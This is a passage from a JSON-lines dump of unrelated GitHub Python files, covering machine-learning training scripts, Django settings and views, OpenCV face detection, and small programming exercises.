scale=self.scale,\n circle_size=0, fast=self.fast_img_gen)\n\n if self.sample_per_channel:\n map_per_channel = map_comapre_channels(\n batch_images.copy(), batch_maps_small_pred,batch_maps_small,\n image_size=int(self.image_size/4), num_landmarks=self.num_landmarks, scale=self.scale)\n\n if self.sample_to_log:\n if self.sample_per_channel:\n summary_img = sess.run(\n self.img_summary, {self.log_image_map: np.expand_dims(merged_img, 0),\n self.log_map_channels: np.expand_dims(map_per_channel, 0)})\n else:\n summary_img = sess.run(\n self.img_summary, {self.log_image_map: np.expand_dims(merged_img, 0)})\n\n summary_writer.add_summary(summary_img, step)\n\n if (self.valid_size >= self.sample_grid) and self.save_valid_images and\\\n (log_valid_images and epoch % self.log_valid_every == 0):\n log_valid_images=False\n\n batch_maps_small_pred_val = sess.run(\n self.pred_hm_p, {self.images: self.valid_images_loaded[:self.sample_grid]})\n\n merged_img = merge_images_landmarks_maps_gt(\n self.valid_images_loaded[:self.sample_grid].copy(), batch_maps_small_pred_val,\n self.valid_gt_maps_loaded, image_size=self.image_size,\n num_landmarks=self.num_landmarks, num_samples=self.sample_grid,\n scale=self.scale, circle_size=0, fast=self.fast_img_gen)\n\n if self.sample_per_channel:\n map_per_channel = map_comapre_channels(\n self.valid_images_loaded[:self.sample_grid].copy(), batch_maps_small_pred_val,\n self.valid_gt_maps_loaded, image_size=int(self.image_size/4),\n num_landmarks=self.num_landmarks, scale=self.scale)\n\n summary_img = sess.run(\n self.img_summary_valid, {self.log_image_map: np.expand_dims(merged_img, 0),\n self.log_map_channels: np.expand_dims(map_per_channel, 0)})\n else:\n summary_img = sess.run(\n self.img_summary_valid, {self.log_image_map: np.expand_dims(merged_img, 0)})\n summary_writer.add_summary(summary_img, step)\n\n else:\n sample_path_imgs = os.path.join(self.save_sample_path,'epoch-%d-train-iter-%d-1.png'\n % (epoch, step + 1))\n scipy.misc.imsave(sample_path_imgs, merged_img)\n if self.sample_per_channel:\n sample_path_ch_maps = os.path.join(self.save_sample_path, 'epoch-%d-train-iter-%d-3.png'\n % (epoch, step + 1))\n scipy.misc.imsave(sample_path_ch_maps, map_per_channel)\n\n print('*** Finished Training ***')\n\n def get_maps_image(self, test_image, reuse=None):\n self.add_placeholders()\n # build model\n pred_hm_p = self.heatmaps_network(self.images,reuse=reuse)\n\n with tf.Session(config=self.config) as sess:\n # load trained parameters\n saver = tf.train.Saver()\n saver.restore(sess, self.test_model_path)\n _, model_name = os.path.split(self.test_model_path)\n\n test_image = test_image.pixels_with_channels_at_back().astype('float32')\n if self.scale is '255':\n test_image *= 255\n elif self.scale is '0':\n test_image = 2 * test_image - 1\n\n test_image_map = sess.run(pred_hm_p, {self.images: np.expand_dims(test_image,0)})\n\n return test_image_map\n","repo_name":"papulke/face-of-art","sub_path":"old/temp/deep_heatmaps_model_primary_net.py","file_name":"deep_heatmaps_model_primary_net.py","file_ext":"py","file_size_in_byte":50203,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"61"} +{"seq_id":"27080635028","text":"\"\"\"\nCache configuration for zygoat projects. We use ``django-redis`` to handle connecting to the cache backend, and then tell django to use a write-through cache backend for sessions. This makes sessions blazingly fast and persistent in the case that the cache gets cleared.\n\"\"\"\n\nfrom .environment import prod_required_env\n\nCACHES = {\n \"default\": {\n \"BACKEND\": \"django_redis.cache.RedisCache\",\n \"LOCATION\": prod_required_env(\"DJANGO_REDIS_CACHE_URL\", \"redis://cache:6379/0\"),\n \"OPTIONS\": {\n \"CLIENT_CLASS\": \"django_redis.client.DefaultClient\",\n },\n }\n}\n\"\"\"\nConfigures the default cache to point to the zygoat generated docker container.\n\"\"\"\n\nSESSION_ENGINE = \"django.contrib.sessions.backends.cached_db\"\n\"\"\"\n.. seealso::\n - `How to use sessions `_\n - `Using cached sessions `_\n\"\"\"\n","repo_name":"MetLifeLegalPlans/zygoat-django","sub_path":"zygoat_django/settings/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37593216893","text":"import os\nimport sys\nimport math\n\ndef find_median(l1,l2):\n median = 0\n result=[]\n result=l1+l2\n result = sorted(result)\n if len(result) % 2 == 0:\n median = math.floor((len(result) - 1)/2)\n else:\n median = (len(result) - 1)/2\n return (result[median],result)\n\nlist1=[]\nlist2=[]\n\nlist1 = input('\\nEnter the first list of numbers: ')\nlist2 = input('Enter the second list of numbers: ')\nlist1=list1.replace(' ',', ')\nlist2=list2.replace(' ',', ')\n\nprint('First list: [' + str(list1)+']')\nprint('Second list: [' + str(list2)+']')\n\nlist1 = [int(x) for x in list1.split(', ')]\nlist2 = [int(x) for x in list2.split(', ')]\n\n(med,res) = find_median(list1,list2)\n\nprint('Merged List: ' + str(res))\nprint('Median: '+ str(med))","repo_name":"karimitani/ECE364","sub_path":"Prelab08/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33484260725","text":"import os\nimport datetime as dt\n# Useful Functions\nDEBUG_DEFAULT = 0\n\n# Wrapper function for dive_for_values where the detail path is a dot list\ndef dive_for_dot_values(dot_locs, info_dir, failzero = False, DEBUG = DEBUG_DEFAULT, as_val = 0, full_path = 1):\n if not isinstance(dot_locs, str):\n if isinstance(dot_locs,list):\n if len(dot_locs) == 1:\n dot_locs = dot_locs[0]\n return dive_for_dot_values(dot_locs,info_dir, failzero, DEBUG, as_val, full_path = full_path)\n else:\n # A list of dot locations\n out_dict = {}\n for dotloc in dot_locs:\n dive_result = dive_for_dot_values(dotloc, info_dir, failzero, DEBUG, as_val=0, full_path = full_path)\n out_dict.update(dive_result) # Dive result must be a dict\n return out_dict\n else:\n print(\" Bad input. Expected string or list of strings but got:\", dot_locs)\n return {}\n\n new_nest_list = _docloc_to_list(dot_locs)\n\n out = dive_for_values(new_nest_list, info_dir, failzero, DEBUG, as_val, full_path = full_path)\n return out\n\n# Recursively looks in dicts for nested dicts until finds values.\n# Returns a dict of values\ndef dive_for_values(nest_list, info_dir, failzero = False, DEBUG = DEBUG_DEFAULT, as_val = 0, full_path = 1):\n if isinstance(nest_list,int) or isinstance(nest_list,float):\n return nest_list\n \n if isinstance(nest_list,list) and len(nest_list) > 0:\n inner_list = nest_list[0]\n if len(inner_list) < 2:\n if len(inner_list) == 1:\n in_in_list = inner_list[0]\n if isinstance(in_in_list, str):\n nest_list = inner_list # Single value but accidentially in a list\n elif isinstance(inner_list[0], str) and isinstance(inner_list[1], list):\n if not len(inner_list) == 2:\n print(\" Bad list length, expected len 2 but got len\",len(inner_list),nest_list)\n return {}\n \n dive_result = _dive(nest_list, info_dir, \"\", failzero = failzero, DEBUG = DEBUG)\n \n # as_val. Returns a raw value IF there is only 1 entry\n if len(dive_result) == 1 and as_val:\n dive_value = list(dive_result.values())[0]\n return dive_value\n\n return dive_result\n\n\ndef _dive(c_list, c_dir, prefix, failzero = False, DEBUG = DEBUG_DEFAULT, full_path = 1):\n out = {}\n for valname in c_list:\n # if DEBUG: print(\" vname\", valname, \"c_list\", c_list)\n if isinstance(valname, list):\n if not len(valname) == 2:\n raise Exception(\" Valname expected len 2\", str(valname))\n nextdirname, nestlist = valname\n if not nextdirname in c_dir:\n if failzero:\n for vn in valname:\n if isinstance(vn, list):\n print(\" vn is a list\",vn)\n return out\n out[vn] = 0\n else:\n if DEBUG: print(\" ERROR! Cannot find subdict<{}> in {}\".format(nextdirname,c_dir))\n return out \n else:\n nextdir = c_dir[nextdirname]\n new_pfx = _dive_prefix(prefix, nextdirname)\n out.update(_dive(nestlist,nextdir, new_pfx, failzero=failzero, DEBUG=DEBUG))\n else:\n if valname in c_dir:\n rawval = c_dir[valname]\n out[valname] = rawval\n elif failzero:\n # Returns 0\n out[valname] = 0\n else:\n if DEBUG: print(\" ERROR! Cannot find variable<{}>\".format(valname))\n \n return out\n\ndef _dive_prefix(oldpfx, cdir):\n tkn = \".\"\n final_prefix = cdir + tkn\n if not oldpfx == \"\":\n final_prefix = oldpfx + tkn + final_prefix\n return final_prefix\n\ndef _docloc_to_list(dot_loc, flatlist = False):\n # str, list\n def collect(curr, prev):\n if flatlist:\n prev.append(curr)\n return prev\n else:\n if prev == []:\n return [curr]\n else:\n return [curr, prev]\n\n pathlist = dot_loc.split(\".\")\n new_nest_list = []\n\n while 1:\n if len(pathlist) == 0:\n break\n curr = pathlist.pop(-1)\n new_nest_list = collect(curr, new_nest_list)\n \n if not flatlist: new_nest_list = [new_nest_list]\n return new_nest_list\n\n# Changes info\ndef dotpop(dotloc, original_info):\n flatlist = _docloc_to_list(dotloc, flatlist = 1)\n curr_d = original_info\n for ddir in flatlist:\n if ddir == flatlist[-1]:\n if ddir in curr_d:\n popped = curr_d.pop(ddir)\n return popped\n else:\n return False\n\n if ddir in curr_d:\n curr_d = curr_d.get(ddir)\n else:\n print(\" WARNING \", ddir,\"not found in\",original_info)\n return False\n\ndef add_enh(key, value, ext_dict, subdict_name, topup, enhanced, persist = False, overwrite = False, DEBUG = 0):\n if DEBUG: print(\"Enhancing!{}:{}\".format(key,value))\n\n if key in ext_dict and not overwrite:\n ext_dict[key] = ext_dict[key] + value\n else:\n ext_dict[key] = value\n \n # Dict of info to be returned and written into main info\n if persist:\n topup[key] = value\n enhanced[key] = value # Write to enhanced main dict instead of subdict\n else:\n # Subdict names inlcude calc_ext and rep_ext\n if not subdict_name in enhanced: enhanced[subdict_name] = {} \n enhanced[subdict_name].update(ext_dict) # Write to the the subdict in enhanced\n return\n\ndef log_error(elog):\n print(\"###! ERROR LOG !###\",elog)\n chatbot_directory = os.getcwd()\n filename = os.path.join(chatbot_directory,\"errorlog.txt\")\n \n try:\n with open (filename, \"w+\") as f:\n prevs = f.read()\n new = prevs + elog\n f.write(new)\n except Exception as e:\n print(\"Failed to log error!\", e)\n return\n\n\ndef cbround(val, dp = 0):\n if isinstance(val, str):\n return val\n \n if dp == 0:\n dp_arg = None # round doesnt work with just 0\n else:\n dp_arg = dp\n \n return round(val,dp_arg)\n\ndef get_yearmonth():\n dtobj = dt.datetime.now()\n years = str(dtobj.year)\n raw_months = str(dtobj.month)\n if len(raw_months) == 1:\n months = \"0\" + str(raw_months)\n else:\n months = raw_months\n out = years + months\n assert(len(out) == 6)\n return out","repo_name":"xcalibersword/chatbot","sub_path":"chatbot_utils.py","file_name":"chatbot_utils.py","file_ext":"py","file_size_in_byte":6666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"25508082673","text":"from menu import Menu, MenuItem\nfrom coffee_maker import CoffeeMaker\nfrom money_machine import MoneyMachine\n\ndef get_request(items):\n return input(f\" What would you like? ({items}): \").lower()\n\ncoffee_maker = CoffeeMaker()\nmoney_machine = MoneyMachine()\nmenu = Menu()\n\ncoffee_maker.is_on = True\n\nwhile coffee_maker.is_on:\n request = get_request(menu.get_items())\n if request == \"off\":\n coffee_maker.is_on = False\n elif request == \"report\":\n coffee_maker.report()\n money_machine.report()\n else:\n drink = menu.find_drink(request)\n if coffee_maker.is_resource_sufficient(drink):\n if money_machine.make_payment(drink.cost):\n coffee_maker.make_coffee(drink)","repo_name":"sdearth/pythoncourse","sub_path":"day016/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3208434592","text":"from typing import List\n\n\nclass Solution:\n def addSpaces(self, s: str, spaces: List[int]) -> str:\n for i in range(len(spaces)):\n index = spaces[i] + i\n s = s[:index] + ' ' + s[index:]\n return s\n\n\ns = \"spacing\"\nspaces = [0,1,2,3,4,5,6]\nsolution = Solution()\nres = solution.addSpaces(s, spaces)\nprint(res)\n","repo_name":"foreverxujiahuan/algorithm","sub_path":"竞赛/A272/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"72660437953","text":"import random\n\nimport numpy as np\nfrom behavioural_cloning import random_search\n\n# Define hyperparameter_space for random search\nhyperparameter_space = {\n \"learning_rate\": [2e-5, 2e-6, 1e-5, 1e-6],\n \"weight_decay\": [0, 1e-2, 1e-3],\n \"kl_loss_weight\": [0.5, 1.0, 2.0],\n \"batch_size\": [16, 32],\n \"max_grad_norm\": [1.0, 2.0, 5.0, 10.0],\n}\n\nif __name__ == \"__main__\":\n # Set the paths and other required variables\n data_dir = \"data/MineRLBasaltBuildVillageHouse-v0\"\n in_model = \"data/VPT-models/foundation-model-1x.model\"\n in_weights = \"data/VPT-models/foundation-model-1x.weights\"\n out_weights = \"train/MineRLBasaltBuildVillageHouse.weights\"\n env_name = \"MineRLBasaltBuildVillageHouse-v0\"\n\n # Run the random search\n best_hyperparameters = random_search(\n data_dir,\n in_model,\n in_weights,\n env_name,\n hyperparameter_space,\n n_iter=15,\n max_batches=5000,\n )\n\n print(\"Best hyperparameters found:\", best_hyperparameters)\n","repo_name":"DagValvik/Human-Guided-Phasic-Policy-Gradient-in-Minecraft","sub_path":"code/hyperparameter_tuning_bc.py","file_name":"hyperparameter_tuning_bc.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39852685149","text":"# test_table.py = test \n\n\nimport lintest\n\nfrom doc import Doc\nfrom table import Table\nfrom database import Database\n\n#---------------------------------------------------------------------\n\nclass T_Table(lintest.TestCase):\n\n def test_creation(self):\n self.db = Database(\"mydatabase\")\n t = self.db[\"mytable\"]\n self.assertEqual(t.count(), 0, \"no documents yet\")\n \n d = Doc(foo=2, bar=3)\n t.addDoc(d)\n self.assertEqual(t.count(), 1, \"1 document now\")\n print(d)\n \n def test_addSomeDocs(self):\n t = self.db[\"mytable\"]\n self.assertEqual(t.count(), 1, \"still 1 document\")\n \n countSB = 1\n for foo in [5,4,6]:\n for bar in ['Cedric', 'Alice', 'Bob']:\n d = Doc(foo=foo, bar=bar)\n t.addDoc(d)\n countSB += 1\n self.assertEqual(t.count(), countSB, \n \"count of documents in mytable\")\n #//for\n #//for\n \n def test_find_all(self):\n \"\"\" find all the documents \"\"\"\n t = self.db[\"mytable\"]\n ds = list(t.find())\n self.assertSame(len(ds), 10, \"returned all 10 douments\")\n \n def test_find_q(self):\n \"\"\" find() using a query \"\"\"\n t = self.db[\"mytable\"]\n ds = list(t.find({'bar':'Alice'}))\n self.assertSame(len(ds), 3, \"returned 3 douments\")\n fooValues = sorted(d.foo for d in ds)\n self.assertSame(fooValues, [4, 5, 6])\n \n \n \n\n#---------------------------------------------------------------------\n \ngroup = lintest.TestGroup()\ngroup.add(T_Table)\n\nif __name__=='__main__': group.run()\n\n#end\n","repo_name":"cabalamat/picobase","sub_path":"picobase/test_table.py","file_name":"test_table.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9301491724","text":"import cv2\n\nface_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')#人脸\neye_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_eye.xml')#人眼\nsmile_cascade=cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_smile.xml')#微笑\n\n#3打开摄像头\ncapture=cv2.VideoCapture(0)\n\nwhile True:\n #读取该帧的画面\n ret, img = capture.read()\n # 6灰度处理\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # 7检查人脸\n faces = face_cascade.detectMultiScale(gray, 1.1, 3, 0, (120, 120))\n\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 255, 255), 3)\n face_area = img[y:y + h, x:x + w]\n eyes = eye_cascade.detectMultiScale(face_area,1.3,10)\n # 用人眼级联分类器引擎在人脸区域进行人眼识别,返回的eyes为眼睛坐标列表\n for (ex, ey, ew, eh) in eyes:\n # 画出人眼框,绿色,画笔宽度为1\n cv2.rectangle(face_area, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 1)\n\n smile = smile_cascade.detectMultiScale(face_area, scaleFactor=1.16, minNeighbors=50, minSize=(50, 50),\n flags=cv2.CASCADE_SCALE_IMAGE)\n # 用人眼级联分类器引擎在人脸区域进行人眼识别,返回的eyes为眼睛坐标列表\n for (ex, ey, ew, eh) in smile:\n # 画出人眼框,绿色,画笔宽度为1\n cv2.rectangle(face_area, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 1)\n cv2.putText(img, 'Smile', (x, y - 7), 3, 1.2, (0, 0, 255), 2, cv2.LINE_AA)\n # 9显示图片\n cv2.imshow(\"test\", img)\n # 10暂停窗口\n if cv2.waitKey(5) & 0xFF == ord('q'):\n break\n#11释放资源\ncapture.release()\n# #12销毁窗口\ncv2.destoryAllWindows()","repo_name":"rainthousand/Old_Care_System_shentianyu","sub_path":"vision/smile/smileDetection.py","file_name":"smileDetection.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"33560105404","text":"import argparse\nimport os\nfrom glob import glob\nfrom concurrent import futures\nfrom pathlib import Path\n\n# don't parallelize internally\nn_threads = 1\nos.environ[\"OMP_NUM_THREADS\"] = str(n_threads)\nos.environ[\"OPENBLAS_NUM_THREADS\"] = str(n_threads)\nos.environ[\"MKL_NUM_THREADS\"] = str(n_threads)\nos.environ[\"VECLIB_NUM_THREADS\"] = str(n_threads)\nos.environ[\"NUMEXPR_NUM_THREADS\"] = str(n_threads)\n\nimport imageio\nfrom csbdeep.utils import normalize\nfrom stardist.models import StarDist2D\nfrom tqdm import tqdm\n\n\ndef apply_model(model, image_path, save_path, scale):\n if os.path.exists(save_path):\n return\n input_ = imageio.imread(image_path)\n input_ = normalize(input_.astype(\"float32\"), 1.0, 99.8)\n nuclei, _ = model.predict_instances(input_, scale=scale)\n assert nuclei.shape == input_.shape[:-1]\n imageio.imsave(save_path, nuclei)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_folder\", \"-i\", required=True)\n parser.add_argument(\"--output_root\", \"-o\", required=True)\n parser.add_argument(\"--model_folder\", \"-m\", required=True)\n parser.add_argument(\"--n_threads\", \"-n\", default=16, type=int)\n parser.add_argument(\"--scale\", \"-s\", default=1, type=int)\n args = parser.parse_args()\n\n images = glob(os.path.join(args.input_folder, \"*png\"))\n print(\"Applying stardist model to\", len(images), \"images\")\n\n output_folder = os.path.join(args.output_root, os.path.basename(args.model_folder))\n os.makedirs(output_folder, exist_ok=True)\n\n def _predict(im):\n model_folder = Path(args.model_folder)\n model = StarDist2D(None, model_folder.name, model_folder.parent)\n name = os.path.basename(im).replace(\".png\", \".tif\")\n save_path = os.path.join(output_folder, name)\n apply_model(model, im, save_path, scale=args.scale)\n\n with futures.ThreadPoolExecutor(args.n_threads) as tp:\n list(tqdm(tp.map(_predict, images), total=len(images)))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bioimage-io/use-cases","sub_path":"case1-stardist/bkp/run_stardist_batch.py","file_name":"run_stardist_batch.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"29230297413","text":"from hashtable import HashTable\n\ndef main():\n size = int(input())\n table = HashTable(size)\n while True:\n command = int(input())\n if command != 0 and command != 1:\n break\n text = input()\n if command == 0:\n table.insert(text)\n else:\n table.remove(text)\n print(table)\n\nif __name__ == '__main__':\n main()","repo_name":"oluiscabral/estrutura-de-dados","sub_path":"trab03/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72530915073","text":"#!/opts/anaconda3/envs/ENV/python\n\"\"\"\nA Bare minimum template for testing with a set up acab engine\n\"\"\"\nimport logging as logmod\nimport unittest\nfrom os import listdir\nfrom os.path import (abspath, exists, expanduser, isdir, isfile, join, split,\n splitext)\nfrom typing import (Any, Callable, ClassVar, Dict, Generic, Iterable, Iterator,\n List, Mapping, Match, MutableMapping, Optional, Sequence,\n Set, Tuple, TypeVar, Union, cast)\nfrom unittest import mock\nfrom unittest.mock import create_autospec\nfrom functools import partial\nimport timeit\n\nlogging = logmod.getLogger(__name__)\n\nimport acab\nimport warnings\nwith warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n config = acab.setup()\n\nfrom acab.modules.engines.basic_engine import AcabBasicEngine\nfrom acab.modules.parsing.exlo.exlo_dsl import EXLO_Parser\nfrom acab.modules.printing.default import DEFAULT_PRINTER\nfrom acab.modules.semantics.default import DEFAULT_SEMANTICS\n\ndef parse_file_runner(eng, f):\n eng.load_file(f)\n\n\nclass FileParsingTests(unittest.TestCase):\n\n\n @classmethod\n def setUpClass(cls):\n LOGLEVEL = logmod.WARNING\n LOG_FILE_NAME = \"log.{}\".format(splitext(split(__file__)[1])[0])\n cls.file_h = logmod.FileHandler(LOG_FILE_NAME, mode=\"w\")\n\n cls.file_h.setLevel(LOGLEVEL)\n logging = logmod.getLogger(__name__)\n logging.root.setLevel(logmod.NOTSET)\n logging.root.handlers[0].setLevel(logmod.WARNING)\n logging.root.addHandler(cls.file_h)\n\n cls.eng = AcabBasicEngine(parser=EXLO_Parser,\n semantics=DEFAULT_SEMANTICS(),\n printer=DEFAULT_PRINTER(),\n modules=[])\n\n @classmethod\n def tearDownClass(cls):\n logmod.root.removeHandler(cls.file_h)\n\n def test_file_parsing_times(self):\n test_loc = join(split(__file__)[0], \"test_files\")\n test_files = [join(test_loc, x) for x in listdir(test_loc)\n if isfile(join(test_loc, x)) and splitext(x)[1] == \".trie\"]\n\n for file_name in test_files:\n with self.subTest(file_name=file_name):\n test_func = partial(parse_file_runner, self.eng, file_name)\n t = timeit.timeit(test_func, number=1)\n with open(file_name) as f:\n lines = len(f.readlines())\n\n logging.warning(\"Length: {}\", lines)\n logging.warning(\"Time : {:.4}\", t)\n","repo_name":"jgrey4296/acab","sub_path":"acab/__tests/test_file_parsing.py","file_name":"test_file_parsing.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"73970396995","text":"import torch\nimport numpy as np\nimport parse_args\nimport model.MINE as MINE\nimport model.RLB as RLB\nimport model.Logits_Loss as LL\nimport utils\n\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = True\n\nopt, model, optim, data = parse_args.collect_args()\n\n# train\nresult_last = []\nif opt['preprocessing'] == 'normal':\n if opt['model'] == 'MINE':\n mi, entropy, bias = MINE.train(data, model, optim, **opt)\n elif opt['model'] == 'RLB':\n mi, entropy, bias = RLB.train(data, model, optim, **opt)\n elif opt['model'] == 'LL':\n Logits_Loss = LL.train(data, model, optim, **opt)\n # print(Logits_Loss[-100:])\n result = (mi, entropy, bias)\n \nelif opt['preprocessing'] == 'indices':\n x_section = np.split(data, opt['indices'], axis=1)\n result_ma_indices_list = []\n for i in range(opt['indices']):\n print('indices number: {}'.format(i))\n x = x_section[i]\n mi, entropy, bias = MINE.train(data, model, optim, opt)\n result_ma_indices = MINE.ma(mi, opt['window_size'])\n result_last.append(result_ma_indices[-1])\n result_ma_indices_list.append(result_ma_indices)\n result_ma = np.mean(np.array(result_ma_indices_list), axis=0)\n\n# save result\nutils.save_result(opt, result)","repo_name":"jiazhi412/Representation-Level-Bias","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74322925953","text":"import sys\n\nfrom itertools import combinations\nfrom collections import defaultdict\nimport operator\n\n\nclass Node(object):\n \"\"\"\n Representation of a computed value result of operate 2 previous elements\n \"\"\"\n\n def __init__(self, value, previous1=None, previous2=None, op=None, gen=0):\n self.p1 = previous1\n self.p2 = previous2\n self.op = op\n self.val = value \n self.gen = gen\n\n #Reprs as string of the class\n def __str__(self):\n return str(self.val)\n\n def __repr__(self):\n return str(self.val)\n\n #Comparator of the class\n def __eq__(self,obj):\n return self.val == obj.val\n\n #Create hash of class. Used when cheching for magic chains\n def __hash__(self):\n return hash(self.val)\n\n #Follow the branch to recreate the operations required\n def recreate(self):\n if(self.gen > 0):\n #Recreate the parents first\n self.p1.recreate()\n self.p2.recreate()\n #Print the operation with parents to obtain this node value\n print(self.op[3].format(self.p1.val,self.p2.val), \"=\", self.val)\n\n \n#Now we define the set op operations following the sintax:\n#(operation, conmutative, restriction(optional), repr )\noperations = [(operator.add, False, lambda x,y: True, \"{}+{}\"),\n (operator.sub, True, lambda x,y: x > y, \"{}-{}\"),\n (operator.mul, False, lambda x,y: True, \"{}*{}\"),\n (operator.truediv, True, lambda x,y: x%y == 0, \"{}/{}\")]\n\n\ndef evolve(lst, gen):\n # we assume that the Node values are unique\n\n #When we got just one element we have finished\n if (len(lst) == 1):\n return lst\n\n #We will operate with pairs since all our operations are binary\n p = combinations(lst, 2)\n\n #The output of compute the parent nodes will be stores in news\n news = []\n \n for pair in list(p):\n #Rewrite the list of elems. For each pair we remove the pair\n #and insert the new elements.\n newList = list(lst)\n newList.remove(pair[0])\n newList.remove(pair[1])\n\n #At this point newList is unique for each pair\n\n #Fore each opearation we create a new node\n for operation in operations:\n aux = list(newList)\n #We chech if the pair satisfies the conditions of the operator\n if operation[2](pair[0].val, pair[1].val):\n n = Node( operation[0](pair[0].val, pair[1].val), pair[0], pair[1], operation, gen)\n aux.append(n)\n news.append(aux)\n\n else:\n pairN = (pair[1], pair[0])\n #Since combinations doesn't count permutation in position we swap the components\n if operation[2](pairN[0].val, pairN[1].val):\n n = Node( operation[0](pairN[0].val, pairN[1].val), pairN[0], pairN[1], operation, gen)\n aux.append(n)\n news.append(aux)\n\n return news\n\ndef evolution(origin):\n\n #We create the first generation\n genesis = evolve(origin, 1)\n print(\"Working!\")\n\n #And repeat the process until complete.\n for i in range(2, 7):\n next2= []\n for block in genesis:\n for k in evolve(block,i):\n next2.append(k)\n genesis = next2\n\n return genesis\n\ndef compose(n, base):\n l = evolution(base)\n #Chech for the Nodes with the desired value\n genes = list(filter(lambda x: x.val == n, l))\n if(genes):\n genes[0].recreate()\n else:\n print(\"No hay solución\")\n\ndef is_magic(base):\n groups = defaultdict(list)\n print(\"Generated full list\")\n #We create a hash table with unique keys. As we perform multiple\n #queries this increments the speed.\n for obj in evolution(base):\n groups[obj.val].append(obj)\n\n for i in range(100,1000):\n if i not in groups.keys():\n return False\n\n #print(\"Se puede generar \", i, \"✔\")\n return True\n \n \n#Manage from console\nif __name__ == \"__main__\":\n\n if(len(sys.argv) == 1):\n print(\"Número de argumentos erroneo\")\n \n elif sys.argv[1] == \"compose\" and len(sys.argv) == 3:\n compose(int(sys.argv[2]), base)\n\n elif sys.argv[1] == \"is-magic\" and len(sys.argv) == 8:\n newBase = []\n for i in range(len(sys.argv) - 2):\n newBase.append(Node(int(sys.argv[i+2])))\n\n if is_magic(newBase):\n print(\"Es una cadena mágica\")\n else:\n print(\"No es una cadena mágica\")\n\n elif sys.argv[1] == \"compose\" and len(sys.argv) == 9:\n newBase = []\n for i in range(len(sys.argv) - 3):\n newBase.append(Node(int(sys.argv[i+3])))\n\n compose(int(sys.argv[2]), newBase)\n \n else:\n print(\"No se reconoció el número de argumentos\")\n","repo_name":"yabirgb/ED","sub_path":"retos/reto2/faster.py","file_name":"faster.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71490312193","text":"longest=\"\"\ndef ordered(s):\n\tl=len(s)\n\tfor inx in range(l-1):\n\t\tif s[inx]>s[inx+1]:\n\t\t\treturn False\n\treturn True\n\ninilen=len(s)\nif inilen==1:\n\tlongest=s\nelif inilen>1:\n\tsublen=inilen\n\twhile sublen>1:\n\t\toffset=inilen-sublen\n\t\twhile offset>=0:\n\t\t\tfor inx in range(offset+1):\n\t\t\t\tsub=s[inx:inx+sublen]\n\t\t\t\tif ordered(sub) and len(sub)>len(longest):\n\t\t\t\t\tlongest=sub \n\t\t\toffset-=1\n\t\tsublen-=1\n\nif not longest:\n\tlongest=s[0]\nprint((\"Longest substring in alphabetical order is: {}\").format(longest))","repo_name":"Devinwon/master","sub_path":"computer-science-and-python-programing-edX/sandbox/practice-problem-set1/problem3-alphabetical-substrings.py","file_name":"problem3-alphabetical-substrings.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30213704990","text":"# django\r\nfrom django.conf import settings\r\nfrom django.shortcuts import render\r\nfrom django.http import HttpResponseBadRequest\r\n# local\r\nfrom .exceptions import EmailVerificationTokenExpired, EmailVerificationTokenInvalid\r\nfrom .models import EmailVerificationToken\r\n\r\n\r\ndef client_email_verify(request):\r\n user_token = request.GET.get(\"token\", None)\r\n context = {\r\n \"url\" : settings.HOSTING_URL,\r\n \"token\" : user_token\r\n }\r\n if not user_token:\r\n return render(request, 'api/verify_invalid_token.html', context)\r\n try:\r\n is_verified = EmailVerificationToken.objects.verify_client(user_token)\r\n except EmailVerificationTokenExpired:\r\n # The verification is expired\r\n return render(request, 'api/verify_email_expired.html', context)\r\n except EmailVerificationTokenInvalid:\r\n # The token is invalid\r\n return render(request, 'api/verify_invalid_token.html', context)\r\n\r\n if is_verified:\r\n # return verified\r\n return render(request, 